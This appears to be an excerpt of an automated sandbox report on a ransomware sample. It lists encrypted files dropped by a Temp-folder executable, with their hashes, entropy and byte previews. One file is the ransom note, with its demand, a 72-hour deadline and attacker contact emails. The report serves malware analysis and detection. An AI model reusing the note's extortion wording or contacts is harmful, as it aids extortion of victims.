                                                                                                                                              Preview:|*...Vm.PB=0.....J.....P..;........`....AT.j_...i.....\.i.....}y..w...W.Lrr.@..RJ.JSX.....F.-.1N...[..\x.g;w&<h1...URB.........gr.a....7.W9E.......8...T6.yy.&.7..y!}..E.5.Ql.qL.Sz........v.S.Q|...kB.a..#....K......}.....S..:..^,.A7o.......j...M.u..E..@.J.....-.4.2?.^..Kb.-..x.`..g.../.....^S&..aKq_..4=u....S...;!..>..=...G..S[..3.~w.W.......$...Y.W...~..2a..Va,W.(W.....Q...>..oO..m. ...>.sS{L...S..C......A..Do..D.A.>C.&..4..M7.....).FUY......M...3.g....S*s._";.:.cz2Ei.g..W.y.GZ..S....rq..,.w.E.:g\......`..|P*.2..B^.-0..2>.e....~.[..y.oo".......P...|`0....K.#V.o.B.:<>.....|2%.C.|.|.U.L.OjJ.x7..i...\... ....5Z.....m.x..v.7_...u.6....<.[k.....e_q..u.u....M...5...jI(@3.q.3.3(.B.C...s7..*..y..4.O.8.M#........?.O..w|ir.....7......\...3...P.b...."..YX..1...w/e...U....../ B...rH..67.}Y..N...a....M.`.-d.3...%1D*..e..[.O}8..s..#......Z.......G...9.#'.(...R%..Za!...b&..R.&..d.V.K....6...N=.*:..o$.V.......P.n.)......n...\.T.91.pje...AK6.4.j..3]...7
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.844060163249539
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:xQp+/6q2yIACXGi6qx9IY8nM+/zaSjQM4SdFbBMsyg0xJcJlmEdWx/IHs:xQp+t2yIAPLY8FzbEhUHMngOcJA2M
                                                                                                                                              MD5:B229E1A02C731B28ADC4AFBA384DC102
                                                                                                                                              SHA1:58FF1BDC141D71517EECE89A00C0B22D620873B0
                                                                                                                                              SHA-256:12E08B40C837A8E8CFB6E297930F801B775F0E23D646081CF94A32CFE83EEAE1
                                                                                                                                              SHA-512:3C34E870A07DF337150355EB901A4B9B71EB17B21FB2CE1B17D54F47EDC4D74D195B3F6EC1EF8C13659186791DA57863BA51F0A207B81BB3A32CE492F40760CA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:|*...Vm.PB=0.....J.....P..;........`....AT.j_...i.....\.i.....}y..w...W.Lrr.@..RJ.JSX.....F.-.1N...[..\x.g;w&<h1...URB.........gr.a....7.W9E.......8...T6.yy.&.7..y!}..E.5.Ql.qL.Sz........v.S.Q|...kB.a..#....K......}.....S..:..^,.A7o.......j...M.u..E..@.J.....-.4.2?.^..Kb.-..x.`..g.../.....^S&..aKq_..4=u....S...;!..>..=...G..S[..3.~w.W.......$...Y.W...~..2a..Va,W.(W.....Q...>..oO..m. ...>.sS{L...S..C......A..Do..D.A.>C.&..4..M7.....).FUY......M...3.g....S*s._";.:.cz2Ei.g..W.y.GZ..S....rq..,.w.E.:g\......`..|P*.2..B^.-0..2>.e....~.[..y.oo".......P...|`0....K.#V.o.B.:<>.....|2%.C.|.|.U.L.OjJ.x7..i...\... ....5Z.....m.x..v.7_...u.6....<.[k.....e_q..u.u....M...5...jI(@3.q.3.3(.B.C...s7..*..y..4.O.8.M#........?.O..w|ir.....7......\...3...P.b...."..YX..1...w/e...U....../ B...rH..67.}Y..N...a....M.`.-d.3...%1D*..e..[.O}8..s..#......Z.......G...9.#'.(...R%..Za!...b&..R.&..d.V.K....6...N=.*:..o$.V.......P.n.)......n...\.T.91.pje...AK6.4.j..3]...7
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.832616912046242
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:tT4rM5W1iOnYYv+uA/2+NcGn7jAc6PNN2hrrgNZlC8Ka06ogyzvWPPvzm:42YZnocGn3+PN8rgADaMz+Xi
                                                                                                                                              MD5:2DD681AB406E9E866C65C910B59B815D
                                                                                                                                              SHA1:ECDA1A125F30C2CFC45EC3E422B28AB17C7D7E1C
                                                                                                                                              SHA-256:EAD3ED757AF3CE5508363AD9E546CB86D0F6ABCBD889475DA9F78BBBE9B9DA87
                                                                                                                                              SHA-512:A80E032FFA75728E7650B61BF4A425C31DE7934CD0DD0102E9AE6F548D3C4FDCDADD1B3A4AAF8F73504AE37A96BAACFA436A20A4F35FFA4BC50D5D891F73B9EA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .c.9;VxU......K}{....9...., .?...)...6........*..XI.B.. ..@...R[."l......C-..R.#..H..\...pC..2....%..O6.u..4\.].f.....E.t..p...$.GsM>._..-.D..X....o.7.S.kA$B.b.O..h.S...#.hD^..)...:.I....o..i......(.=.I.....y.M...VY...Cp8.v....O-.N..-..rY....4.4.....\./....*.#..../.I&..g~..\q..q.Rm..7....sy.&*.......q..<%.."...:...Jo......ck.i.?....[......&q....."..H.W.1o.....%.... .wX..H>U\....O.....^,.........ccx.....!..g. .T_.....6..A..... 6.y..G.......BF5...7.dP.r.G.pk%.ne......s|.F{.hh).[o8q.+ZUc...dDB7......D....w.m..=. N..,=t.mk@.t.7)k..I......h. ..l.e0..W...U......e...BDS.y...(.Sq..1Xq.D.L.....q0z.....MsH/j....U..q.;%.Y.I..1...r.H.}.b.|c*A..v.Z....A"..]VS......2......DM.M<...J..8kB{4.5."..'.....C.uv......yQ1:N.....d.L.KL..n...k.......V..:....Uv.Qs[....r......s.....{:.@.'p.-......-.i:#......-..E.(.t^.'?...`......%.*...)..9!...\..I+=C..v.V......".O..rg65\.g.Vn.)mxd.6..@5.k]jKqEc..`...UGmU....-..)7.w}.8.8I"O&....g....1%...].vJ..8.H(..d>{.h
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.832616912046242
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:tT4rM5W1iOnYYv+uA/2+NcGn7jAc6PNN2hrrgNZlC8Ka06ogyzvWPPvzm:42YZnocGn3+PN8rgADaMz+Xi
                                                                                                                                              MD5:2DD681AB406E9E866C65C910B59B815D
                                                                                                                                              SHA1:ECDA1A125F30C2CFC45EC3E422B28AB17C7D7E1C
                                                                                                                                              SHA-256:EAD3ED757AF3CE5508363AD9E546CB86D0F6ABCBD889475DA9F78BBBE9B9DA87
                                                                                                                                              SHA-512:A80E032FFA75728E7650B61BF4A425C31DE7934CD0DD0102E9AE6F548D3C4FDCDADD1B3A4AAF8F73504AE37A96BAACFA436A20A4F35FFA4BC50D5D891F73B9EA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: .c.9;VxU......K}{....9...., .?...)...6........*..XI.B.. ..@...R[."l......C-..R.#..H..\...pC..2....%..O6.u..4\.].f.....E.t..p...$.GsM>._..-.D..X....o.7.S.kA$B.b.O..h.S...#.hD^..)...:.I....o..i......(.=.I.....y.M...VY...Cp8.v....O-.N..-..rY....4.4.....\./....*.#..../.I&..g~..\q..q.Rm..7....sy.&*.......q..<%.."...:...Jo......ck.i.?....[......&q....."..H.W.1o.....%.... .wX..H>U\....O.....^,.........ccx.....!..g. .T_.....6..A..... 6.y..G.......BF5...7.dP.r.G.pk%.ne......s|.F{.hh).[o8q.+ZUc...dDB7......D....w.m..=. N..,=t.mk@.t.7)k..I......h. ..l.e0..W...U......e...BDS.y...(.Sq..1Xq.D.L.....q0z.....MsH/j....U..q.;%.Y.I..1...r.H.}.b.|c*A..v.Z....A"..]VS......2......DM.M<...J..8kB{4.5."..'.....C.uv......yQ1:N.....d.L.KL..n...k.......V..:....Uv.Qs[....r......s.....{:.@.'p.-......-.i:#......-..E.(.t^.'?...`......%.*...)..9!...\..I+=C..v.V......".O..rg65\.g.Vn.)mxd.6..@5.k]jKqEc..`...UGmU....-..)7.w}.8.8I"O&....g....1%...].vJ..8.H(..d>{.h
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8453109154953875
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:9qyenMOoynB/RQpBUvxCc3iT9KCMVWQBSXFTCoiKQhmoqLzEmy9Z:9peBqkvx7iTx8lB6moKmoN
                                                                                                                                              MD5:5B1AA20DE6B7E3C43295D4D7D7D8F3B8
                                                                                                                                              SHA1:9AF14DA314AAB8AE523D476B48C77E9A0D1CE3CE
                                                                                                                                              SHA-256:5DE68DB0521C4B5DF13A8A07CCE7B75B99090EAB9A9165DE9BAF317E127AC8AA
                                                                                                                                              SHA-512:DF71CC4B2476519B3AAA485B47E3D322620BF85B521FE6CC8884B68BD67BC7D04EDEFAC200E9CF9332FFE3F1C4CBABF3C3676CD27C4B6D3473B6912C63701302
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:/.X-0.5.m....... ."..I....7.#_.....s.\.[..]s.A. ...D.?.=HzI.5..;8.....P....4........T..d..^9v=.NJ.h...4.?.Z.k.Cm6.v..k>.)rr]!...o.......r.........#.D.r...YO<.../..V......k.1PR.m...&].FT.O..q...f...NL.wCx..~U.."A]..j......=..4\d.`..Zm...CiO.}(.5.B..o.#.9.....s/f..D.\.q9.}.<......'....xE..KU.%....?;$YeC..~...Ky.....l....~.z..Wt.H(%k....N.......m."..6......|G..q..M.T!.=Q......f3}....[p....!{...6*..4$..P..]y.;......kd.j..p.p...F.............b.Eg`..EE`!.A..^^_&..2..<u...+...&.$...;....?9PD<.[.._s........9P....I.qJ..}...gM.......5.z.....)V....>.a.sK..,U*3....L./...0.$....G..huv.3".cP..<..........[.V*0.}Pw.,.7... .#P........i....\]..8...z.qd;.!..;..DEW[...)..j.....(....8].L.G..tX.)........erf].pt.nJ......b.j...MQY~.......A...40q../].8...?.).<).V.".|.C.....#.2..../.....".."fc.....).o...v.....-...W.?........Pq=.1A...)...y....M#\..#a...B..I....u$..H?8Di.e....n...../Y..3.Sf8....;Tr^....}.V=<..z..,Z....].F2.|kx....? .......jA.&&.?.5z.J<......u.d..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8453109154953875
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:9qyenMOoynB/RQpBUvxCc3iT9KCMVWQBSXFTCoiKQhmoqLzEmy9Z:9peBqkvx7iTx8lB6moKmoN
                                                                                                                                              MD5:5B1AA20DE6B7E3C43295D4D7D7D8F3B8
                                                                                                                                              SHA1:9AF14DA314AAB8AE523D476B48C77E9A0D1CE3CE
                                                                                                                                              SHA-256:5DE68DB0521C4B5DF13A8A07CCE7B75B99090EAB9A9165DE9BAF317E127AC8AA
                                                                                                                                              SHA-512:DF71CC4B2476519B3AAA485B47E3D322620BF85B521FE6CC8884B68BD67BC7D04EDEFAC200E9CF9332FFE3F1C4CBABF3C3676CD27C4B6D3473B6912C63701302
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:/.X-0.5.m....... ."..I....7.#_.....s.\.[..]s.A. ...D.?.=HzI.5..;8.....P....4........T..d..^9v=.NJ.h...4.?.Z.k.Cm6.v..k>.)rr]!...o.......r.........#.D.r...YO<.../..V......k.1PR.m...&].FT.O..q...f...NL.wCx..~U.."A]..j......=..4\d.`..Zm...CiO.}(.5.B..o.#.9.....s/f..D.\.q9.}.<......'....xE..KU.%....?;$YeC..~...Ky.....l....~.z..Wt.H(%k....N.......m."..6......|G..q..M.T!.=Q......f3}....[p....!{...6*..4$..P..]y.;......kd.j..p.p...F.............b.Eg`..EE`!.A..^^_&..2..<u...+...&.$...;....?9PD<.[.._s........9P....I.qJ..}...gM.......5.z.....)V....>.a.sK..,U*3....L./...0.$....G..huv.3".cP..<..........[.V*0.}Pw.,.7... .#P........i....\]..8...z.qd;.!..;..DEW[...)..j.....(....8].L.G..tX.)........erf].pt.nJ......b.j...MQY~.......A...40q../].8...?.).<).V.".|.C.....#.2..../.....".."fc.....).o...v.....-...W.?........Pq=.1A...)...y....M#\..#a...B..I....u$..H?8Di.e....n...../Y..3.Sf8....;Tr^....}.V=<..z..,Z....].F2.|kx....? .......jA.&&.?.5z.J<......u.d..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.839817610473374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:b6wvZ69lnHh/xybcorBdB9bab5hxqOdgjYRtHuVPIGo:b6wvZMFM19bwxmUQPIT
                                                                                                                                              MD5:BFD7C7A9C05EE571ED5ECC365F4E1EB7
                                                                                                                                              SHA1:55F6C738F4FAAACD736AC7514638D4D0C9D58DA7
                                                                                                                                              SHA-256:7388CDDA4A540A93CFAB17E2DC6E22C0AA5137254D64173114890D99A92FE6DA
                                                                                                                                              SHA-512:4D98E83786152DFD22180F4A6D47028799EEE9B0DBEC4432B4D4100698D460F623C4CD6E352925893BF7E2228923ECD17CB61EFD7A88FA9C8584D39C0AE82F24
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...\J...h..6.....hA..A.*g?|...5'.$.....o.m...05p..;.`...c.....x.&....b;..=..._.C......t..w..!/p......<.gu..z(g,.E<.R.-zr0tT..........[..?Z.<......B.,.\./...<S..k........bI.>.t....{.......z..B...2..5..\;.....c.cG....pn]5.X4.A.8..Fn+....o..,l...Q.8g.J7..-.(.M..6&..4{}B.6..<..p.....t...x,.k}....iE.;zO.6..z>.+...GJ.......b.....:...UN.....x..*ol.J..V...n..Xs.H".............sI....i.i....tF..E||..Y.:.O..Cad?/O......fX.hd..9Iv\5.j*..7I.. x....Z..p.DJ..[........~.d..^1......l.....!.f.$.,...}$..z.E.e.A~7..7\!J.;...6$..`.;d.#j...Fr.L.X..3.m.o.crF.j.A.........x......n......OA.C..z|...8..^O....Pj".4B2...#T..vpS..Z....;....`..1.....'...S@.u\.<...>xF..7.M*.....qr.+Q.N...c.<J..L.3(..I.g..*......|>l3b..x..MK>:z.p%....V...u?..,.v6.. ...j.n.......g..u.C<...b.K..-P.A1...[.i.p..>..../.&B..Y...p..6^.pqC..V. ...6...(%.u.a.........?+&......7e....~.rL...o.K....%....."Ro.......7o.v.r.h...2.....$.U..]"..*&.&t..=..G.....t....o......R.'gLk.k.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.839817610473374
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:b6wvZ69lnHh/xybcorBdB9bab5hxqOdgjYRtHuVPIGo:b6wvZMFM19bwxmUQPIT
                                                                                                                                              MD5:BFD7C7A9C05EE571ED5ECC365F4E1EB7
                                                                                                                                              SHA1:55F6C738F4FAAACD736AC7514638D4D0C9D58DA7
                                                                                                                                              SHA-256:7388CDDA4A540A93CFAB17E2DC6E22C0AA5137254D64173114890D99A92FE6DA
                                                                                                                                              SHA-512:4D98E83786152DFD22180F4A6D47028799EEE9B0DBEC4432B4D4100698D460F623C4CD6E352925893BF7E2228923ECD17CB61EFD7A88FA9C8584D39C0AE82F24
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...\J...h..6.....hA..A.*g?|...5'.$.....o.m...05p..;.`...c.....x.&....b;..=..._.C......t..w..!/p......<.gu..z(g,.E<.R.-zr0tT..........[..?Z.<......B.,.\./...<S..k........bI.>.t....{.......z..B...2..5..\;.....c.cG....pn]5.X4.A.8..Fn+....o..,l...Q.8g.J7..-.(.M..6&..4{}B.6..<..p.....t...x,.k}....iE.;zO.6..z>.+...GJ.......b.....:...UN.....x..*ol.J..V...n..Xs.H".............sI....i.i....tF..E||..Y.:.O..Cad?/O......fX.hd..9Iv\5.j*..7I.. x....Z..p.DJ..[........~.d..^1......l.....!.f.$.,...}$..z.E.e.A~7..7\!J.;...6$..`.;d.#j...Fr.L.X..3.m.o.crF.j.A.........x......n......OA.C..z|...8..^O....Pj".4B2...#T..vpS..Z....;....`..1.....'...S@.u\.<...>xF..7.M*.....qr.+Q.N...c.<J..L.3(..I.g..*......|>l3b..x..MK>:z.p%....V...u?..,.v6.. ...j.n.......g..u.C<...b.K..-P.A1...[.i.p..>..../.&B..Y...p..6^.pqC..V. ...6...(%.u.a.........?+&......7e....~.rL...o.K....%....."Ro.......7o.v.r.h...2.....$.U..]"..*&.&t..=..G.....t....o......R.'gLk.k.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.859482471535593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:qnsGUoi24Wx0PAS63pLot3PRDn07e8HRAMcPyeYr5z30l9ZgFXoPC2:qsGs7Wx0PAT5Enn0agRpWV630PZqYa2
                                                                                                                                              MD5:6C7E969C3AAC88358CBCE5262D146816
                                                                                                                                              SHA1:749CA6C67BAAF25AFC7C2941585E23FC5AFC8973
                                                                                                                                              SHA-256:897012B7829BFE75AB6A42F01E38860EBF77FBB9ACA5A3F5D8D19B3F2B90DB1E
                                                                                                                                              SHA-512:059792F1024D0B93ADA997F68E18972453C68038ABC8B0D6BA2158A290B5400CDCAC1D64D9D4A77A3B3BAFF0602A24795D0F93DD33BE2C41ABC1B4A57420708E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..\.V#/...b...$..S....y,....R-.......%..l...1........m..Oo....E.w.*B....B.&P5.r..^I.)_....|.?~..;3.+.9R.V....q%IV..-h..@i.y......Z[..{,3./.kj.+.....)..u.~.s....$..E..".a1.....U.(.W.6...B..kH2,k..}.Q..H...........s.\.ViC.E.(..;..3\..<}mr(..K..e\.n.......\V..........EL.wr.$.W.W=&...$......)....F..i..... ....].K.(1=.7...2...) .V7...A...l.........{..y.L.@.YF...eA..#G.F]..i.jv.d.C......uA-S....%?VO5.u...&?...E..aZ{NX!a..p...o.4../!A..kq.jzLv...Mj.~...z.^"..+...Tj.>....r..p.m&.._b.N.....[..U{.......^6...U...{..HOt`....^w..Q5k.....h..w."-.h`.p.7@......=o,....u.~...{..N3uz..a./~]...R>..G.||.?wN.'...i8.....bp.:.q.......b..g......:.1..q9E.h.A..-...]<!+...U`......+`..)..G.Q..".....;....... ....9..=.[.bn...{#/....Y.$f..s.4.*.&:......>.5..l.A.N..T..(.2.....]8.tY.[eNM...\..$e......U7...L..U.$..`...#.g.......K.c..*U.N....F.^.Zv.>..w.)I.....dQ.q.EQ...-..^wpU{.TtkL.9......Hq.....[....BZA....GLe.4.......&..:.q.:V.....}~.8.......M.r ....R....Fx.N.....v^...8.....?....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.859482471535593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:qnsGUoi24Wx0PAS63pLot3PRDn07e8HRAMcPyeYr5z30l9ZgFXoPC2:qsGs7Wx0PAT5Enn0agRpWV630PZqYa2
                                                                                                                                              MD5:6C7E969C3AAC88358CBCE5262D146816
                                                                                                                                              SHA1:749CA6C67BAAF25AFC7C2941585E23FC5AFC8973
                                                                                                                                              SHA-256:897012B7829BFE75AB6A42F01E38860EBF77FBB9ACA5A3F5D8D19B3F2B90DB1E
                                                                                                                                              SHA-512:059792F1024D0B93ADA997F68E18972453C68038ABC8B0D6BA2158A290B5400CDCAC1D64D9D4A77A3B3BAFF0602A24795D0F93DD33BE2C41ABC1B4A57420708E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..\.V#/...b...$..S....y,....R-.......%..l...1........m..Oo....E.w.*B....B.&P5.r..^I.)_....|.?~..;3.+.9R.V....q%IV..-h..@i.y......Z[..{,3./.kj.+.....)..u.~.s....$..E..".a1.....U.(.W.6...B..kH2,k..}.Q..H...........s.\.ViC.E.(..;..3\..<}mr(..K..e\.n.......\V..........EL.wr.$.W.W=&...$......)....F..i..... ....].K.(1=.7...2...) .V7...A...l.........{..y.L.@.YF...eA..#G.F]..i.jv.d.C......uA-S....%?VO5.u...&?...E..aZ{NX!a..p...o.4../!A..kq.jzLv...Mj.~...z.^"..+...Tj.>....r..p.m&.._b.N.....[..U{.......^6...U...{..HOt`....^w..Q5k.....h..w."-.h`.p.7@......=o,....u.~...{..N3uz..a./~]...R>..G.||.?wN.'...i8.....bp.:.q.......b..g......:.1..q9E.h.A..-...]<!+...U`......+`..)..G.Q..".....;....... ....9..=.[.bn...{#/....Y.$f..s.4.*.&:......>.5..l.A.N..T..(.2.....]8.tY.[eNM...\..$e......U7...L..U.$..`...#.g.......K.c..*U.N....F.^.Zv.>..w.)I.....dQ.q.EQ...-..^wpU{.TtkL.9......Hq.....[....BZA....GLe.4.......&..:.q.:V.....}~.8.......M.r ....R....Fx.N.....v^...8.....?....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1315
                                                                                                                                              Entropy (8bit):7.822069935543507
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:FD/ijaPG/tX9i7oRNfbRl8owB66NFUHbVwov7rZNNEr/5demm:gEGF9DRioqE7u2PNEr/a
                                                                                                                                              MD5:23C782685336D96CE0CDB434DCDD7479
                                                                                                                                              SHA1:0BEA3D8DB3689BF06BACD4E0F2F497EDA3D94743
                                                                                                                                              SHA-256:BEF4786C1C06E97D0C2D148A8F10F62C8B7F9F04E3F97699A629713B0E2896AF
                                                                                                                                              SHA-512:53E0FEC2016B623C51DF3B9247F91BC8BC3857F760E9DBAA506218A5DE60BE382F75BB2120C79522B8841E35967DA7FB666457B2CE5E3B422A3A0F0C81B4008D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:c.........2..C..1.r..p...3.........A.0./.....2.VR+..d.(....%.............}.cVs./V..u.....wJ....+.......O6T..5...N.N.....jY..9..fw,.Mq'......q<..\.Zt*. P F........9.$&o*.i.{......LE....,8....6..4.mO]....b...h^O'_...P.qJ]vGZ..Yp.6..3Ad).....Upx....d.I...A.........>.R.T.S..~y...M..........ds'.'.rzF..l.M....y.Y.&..n.&s#?.../.Z..x.+8M....G..........+]6;./......{..{.ccv...UH...5.S......[./...)..M.:.k^.../.`...P.XB.Uc.|J]...v.....<.a.,.o..XC3h<..5t....@.Wy.........%J4.\.{....q...^C...00..........M..*....n....f.x.o.{.....E..9bG.Y..W[.......B.H:..9..$9..O.Y.dw~.......)..K..AN/@..............'*O..F.p..C.x).....b.y^.Z.....C{......:q...vXEl...!..$....p=......0M.v.4......<F.f|R...`.;..|Z...ta4B...|4h..)...T..jU.S..!v.(..6..Q..<...N....lsL...Q2wZ..G..d..;..g6...,.R...j.........x..^..kc.....p.|N....M.."9.n..1..29......I..:.2...@+U.@.....ct.`.y\..ao..sZ..Z>l."..^X.....d.....6.....-?*q.....i.z.+...5....V#@...Vm"..e.,..$.........n"#8@{($.......,.G..4
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1315
                                                                                                                                              Entropy (8bit):7.822069935543507
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:FD/ijaPG/tX9i7oRNfbRl8owB66NFUHbVwov7rZNNEr/5demm:gEGF9DRioqE7u2PNEr/a
                                                                                                                                              MD5:23C782685336D96CE0CDB434DCDD7479
                                                                                                                                              SHA1:0BEA3D8DB3689BF06BACD4E0F2F497EDA3D94743
                                                                                                                                              SHA-256:BEF4786C1C06E97D0C2D148A8F10F62C8B7F9F04E3F97699A629713B0E2896AF
                                                                                                                                              SHA-512:53E0FEC2016B623C51DF3B9247F91BC8BC3857F760E9DBAA506218A5DE60BE382F75BB2120C79522B8841E35967DA7FB666457B2CE5E3B422A3A0F0C81B4008D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:c.........2..C..1.r..p...3.........A.0./.....2.VR+..d.(....%.............}.cVs./V..u.....wJ....+.......O6T..5...N.N.....jY..9..fw,.Mq'......q<..\.Zt*. P F........9.$&o*.i.{......LE....,8....6..4.mO]....b...h^O'_...P.qJ]vGZ..Yp.6..3Ad).....Upx....d.I...A.........>.R.T.S..~y...M..........ds'.'.rzF..l.M....y.Y.&..n.&s#?.../.Z..x.+8M....G..........+]6;./......{..{.ccv...UH...5.S......[./...)..M.:.k^.../.`...P.XB.Uc.|J]...v.....<.a.,.o..XC3h<..5t....@.Wy.........%J4.\.{....q...^C...00..........M..*....n....f.x.o.{.....E..9bG.Y..W[.......B.H:..9..$9..O.Y.dw~.......)..K..AN/@..............'*O..F.p..C.x).....b.y^.Z.....C{......:q...vXEl...!..$....p=......0M.v.4......<F.f|R...`.;..|Z...ta4B...|4h..)...T..jU.S..!v.(..6..Q..<...N....lsL...Q2wZ..G..d..;..g6...,.R...j.........x..^..kc.....p.|N....M.."9.n..1..29......I..:.2...@+U.@.....ct.`.y\..ao..sZ..Z>l."..^X.....d.....6.....-?*q.....i.z.+...5....V#@...Vm"..e.,..$.........n"#8@{($.......,.G..4
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.175470675410611
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:ZF2OmjSFC60mVqukt+fiiy8fPYong+yHtWSKF2okBY+gpXxMe0no3wyUkRJw8e3k:VmjS1VVktuxyKPt6spVD0nROwin
                                                                                                                                              MD5:0A580438824D177298AFD7491A269E27
                                                                                                                                              SHA1:917E7B2879E39DA9736B18D0F10C29EC947881C4
                                                                                                                                              SHA-256:1B5704208AF65EC0B09D43C78AA0478588F4DAD62DD589E51BB0CE0152F2C1B3
                                                                                                                                              SHA-512:0FCC61CADE4903B37EB6465D9EED7EF35146C06E06701D04C1BD38FCBAE756F62FD69401BBFA6FFA4D9EB26106BAFF3F18328E36364C98954CBC4D7F6395C723
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........Q..zU.5..........;%6KI....g.U..|cF.u..T..A...=..#.....+C...E......../.O.`..A...1:...l.8..dsU.......#..P@...=..u.....7..pR.....B:h.T....a.M.A....{...Y|E...L.O..Pc..~.;."..=."...y.......0Q.)...30N.....n....$..#.y........vA...0s..C.......~4".t1A..G._.V..u.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.1868376152016555
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:2rsnGUofUBb0FGvsdOAmIloMkLkKmgudUID99f2ukHn:wEOsGGvumtLFmguGID99f27n
                                                                                                                                              MD5:B00771F708A878958CD0C46FD0C56E94
                                                                                                                                              SHA1:D4D264EB4A83EBF73C246E9685F1681F106C1FF1
                                                                                                                                              SHA-256:3D575148819C99B5F19F496EFEB72C8258C53EFCCACB94ED02BD0C22DAB424D5
